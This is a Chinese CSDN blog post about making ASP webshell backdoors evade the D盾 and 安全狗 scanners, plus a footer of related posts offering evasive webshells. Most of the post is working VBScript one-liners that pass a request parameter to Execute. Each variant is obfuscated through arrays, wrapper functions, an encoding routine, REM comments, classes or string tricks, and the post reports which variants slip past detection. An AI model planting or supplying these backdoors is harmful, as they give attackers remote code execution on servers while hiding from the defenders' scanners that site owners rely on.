shell 免杀aspx_asp免杀webshell木马总结

最新推荐文章于 2024-06-22 17:45:00 发布
最新推荐文章于 2024-06-22 17:45:00 发布
阅读量1.2k 收藏 2
点赞数
文章标签: shell 免杀aspx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30045055/article/details/113001215
版权

0x00 前言

asp免杀webshell木马总结

简单的介绍下asp的免杀,相对于php我们的asp还是不够灵活.

0x01 目录

数组

函数

加密

注释符

字符串操作

0x02 了解asp一句话

ASP解释器还有:VBScript

ASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//

ASP的执行函数 : Eval 、 Execute 、ExecuteGlobal

0x03 数组

利用数组来免杀,因为我们在php免杀中使用过数组,他的效果还不错,那么我们是否可以利用到asp来,当然答案是肯定的

其中定义数组的方法有多种方式,我们才用最简单方式来看看

dim a(5)

a(0)=request("404")

eXecUTe(a(0))

%>

简单的数组定义D盾就不认识了,为什么我会想到用数组来绕过,因为我发现函数调用的时候D盾不敏感,包括asp,php等

当然你还可以这样用,加上一点循环语句

dim array(1)

dim c

array(1)=request("404")

for each a in array

c = a & ""

next

execute(c)

%>

0x04 函数

这个是那天D盾更新,无意间测试出来的,发现d盾对函数传入不是很敏感

Function b():

b = request("404")

End Function

Function f():

eXecUTe(b())

End Function

f()

%>

0x05 加密

网上随便找了一段加密算法 但是测试发现D盾爆了一级,参数未知

eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600"))

function gw_jiemi(text)

const key="gw"

dim str : str=text

dim str1

dim str2 : str2=strreverse(str)

for i=1 to len(str2) step 4

str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))

next

gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))

end function

%>

既然都提示我们参数的问题了,那么简单的干扰一下吧,连接个空字符

eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600")&"")

function gw_jiemi(text)

const key="gw"

dim str : str=text

dim str1

dim str2 : str2=strreverse(str)

for i=1 to len(str2) step 4

str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))

next

gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))

end function

%>

解密的算法是

function gw_jiami(text)

const key="gw"

dim str : str=key & text

dim str1

dim str2

for i=1 to len(str)

str2=hex(AscW(mid(str,i,1)))

for j=1 to 4-len(str2)

str2="0" & str2

next

str1=str1 & str2

next

gw_jiami=strreverse(str1)

end function

0x06 注释符

通过一个简单的注释符绕过安全狗还是比较简单的,

a = request("404")

b = a REM a

execute(b)

%>

怎么绕过d盾了想了几分钟发现可以这样

%>

0x07 类

在php中我们使用类可以很轻松的绕过,但是asp使用类现在d盾看的很紧,首先看看最简单的类

Class LandGrey

Private Sub Class_Initialize

execute request("404")

End Sub

End Class

Set X = New LandGrey

%>

利用Class_Initialize 初始化就调用我们的函数,但是已经不行了,那么我们简单的变形一下

Class LandGrey

private str_title

public property let setauthor(str)

execute str REM a

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

这个D盾爆出一级,提示未知参数str,怎么绕过呢,我们可以用函数的方式把他包裹起来 跟前面方案一样

Class LandGrey

private str_title

public property let setauthor(str)

execute(str&"")

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

但是提示语句没结束语法问题,那就改改,用括号包裹起来调用,同时利用REM注释后面的内容,d盾就会识别括号里面有内容,从而绕过

Class LandGrey

private str_title

public property let setauthor(str)

execute(str )REM a)

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

前面说过他提示的参数没 赋值 那么我们就定义一个局部变量来赋值吧

Class LandGrey

private str

Private Sub Class_Initialize

str = ""

End Sub

public property let setauthor(str)

execute(str)

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

0x08 字符串操作

前面php的webshell我们讲过,d盾是杀参数的,我们如何绕过的思路就是在传入参数这里做文章,先来一个简单的

a = request("404")

b = Left(a,99999)

execute(b)

%>

D盾直接爆4级,我们再找个函数包裹一下我们的a字符串,UCase大小写转换

a = request("404")

b = Left(UCase(a),99999)

execute(b)

%>

还是4级,那么我们在后面连接一个空格呢,那么他就能完美绕过

a = request("404")

b = Left(UCase(a)&"",99999)

execute(b)

%>

王晋东不在家
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 636
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
教你aspx免杀的小技巧
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-05 2076
导读:   今天黑站的时候,经常用的aspx怎么也上传不了,断定是被杀了。   BBS.bitsCN.com网管论坛   要提权就得用aspx,怎么办呢?网上找不到免杀。无赖之下,只有找出中的特征码。   BBS.bitsCN.com网管论坛   尝试了好久。终于找到了。LOOK:bitsCN#com中国网管联盟   Sub RunCMD(Src As Object, E As
shell 免杀aspx_避开eval关键字,打造免杀一句话木马
weixin_30304773的博客
01-16 1948
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
渗透干货|史上最全一句话木马
最新发布
qkh1234567的博客
06-22 997
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包。😝有需要的小伙伴,可以点击下方链接免费领取【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析。
shell 免杀aspx_免杀 webshell 小叙 [ 一 ]
weixin_39607798的博客
01-13 500
0x01 基于各类常规命令和代码执行函数的花样变形[如,拆分重组,动态执行,以此来躲避静态特征检测],不过像有些高危函数默认就会被运维们禁掉,甚至高版本的php默认已经不让执行[如,php7],万一再开了安全模式,就又有点儿费劲了php中一些常见的执行类型函数:system()exec()shell_exec()passthru()proc_open()`` 反引号执行系统命令...利用rot13...
shell 免杀aspx_发个免杀修改的aspx提权
weixin_35559202的博客
12-31 400
htmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">protectedvoidPage_load(objectsender,EventArgse){stringok=Request.QueryString["s...
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW_免杀_webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP WebshellWebshell通常被黑客用于远程...
Decryption-WEBSHELL.rar_asp webshell_webshell_webshell asp
09-24
标签"asp_webshell"、"webshell"和"webshell_asp"进一步强调了这是与ASP语言相关的Webshell知识。这些标签有助于分类和搜索,让对ASP Webshell感兴趣的人能更容易地找到相关资源。 在压缩包中的"老版.asp"文件,...
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
php shell超强免杀、减少体积工具实现代码
10-27
不是webshell,只是个webshell免杀工具,切勿当初webshell使用,仅限免杀phpwebshell
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 625
一句话木马在渗透测试中最常用的就是一句话后门(小)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大。最常见的php一句话木马这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
ASP免杀
10-02
ASP免杀
免杀ASP(防删)
12-04
这款asp免杀名字就能唬住人,不过经黑友反应说免杀性能极好。稳定性强,兼容多款浏览器。支持批量挂(支持gb2312编码),批量清,以及批量替换的功能。一次性替换百万个页面也不会脚本超时。还有防清除功能。稳定性强,兼容多款浏览器。
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy f.jpg/b +x.aspx/a hez.jpg
ASP超强提权免杀珍藏版.asp
10-10
mNametitle ="超强提权免杀珍藏版" Copyright=" 免杀珍藏版 " SItEuRl="http://caidaome.com/" bg ="http://www.baidu/newsjpg/0.jpg" ysjb=true htp="http://127.0.0.1" durl="http://caidaome.com/" Response.Buffer =true BodyColor="#f8f47e" FontColor="#f8f47e" LinkColor="#f8f47e"
2016年免杀asp.提权防删
11-02
带密码功能,默认密码abcd。代码加密免杀,自带各种提权防删除功能。
shell 免杀aspx_绕过WebShell检测的总结之文件免杀
weixin_31124869的博客
12-31 557
WAF会维护一个规则库记录webshell常用的函数、方法、结构,当匹配上对应特征时便发出警告、直接封禁或隔离。但是安全厂商们为了提升用户体验,一般会以可用性为首要目标,其次才是安全性,这是一个硬伤也是绕过的基础由于正常业务功能的需要,WAF通常并不会全盘枪毙语言中可以执行代码的结构或函数(比如eval),而是判断敏感函数是否处于某种木马后门常用且业务功能不常用的结构中,绕过即是找出既能达到目的又...
asp-Webshell免杀
weixin_44110913的博客
08-23 3318
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。 本篇文章主要梳理ASP一句话Webshell的构建和规避检测软件达到源文件免杀的思路。最终构建能够同时绕过以下表格中8个专业木马查杀工具和平台检测的Webshell,构造出零提示、无警告、无法被检测到的ASP一句话木马后门。 编号 名称 参考链接 1 网站安全狗(.
无限免杀D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3535
前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句话 Aspx的一句话一般是使用Jscript语言实...
免杀webshell
10-17
我理解你的问题是如何编写一个免杀webshell。这是一个非常敏感的话题,因为 webshell 的使用可能会导致安全漏洞和数据泄露。因此,我不会提供任何有关编写 webshell 的具体指导。相反,我可以给你一些建议,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值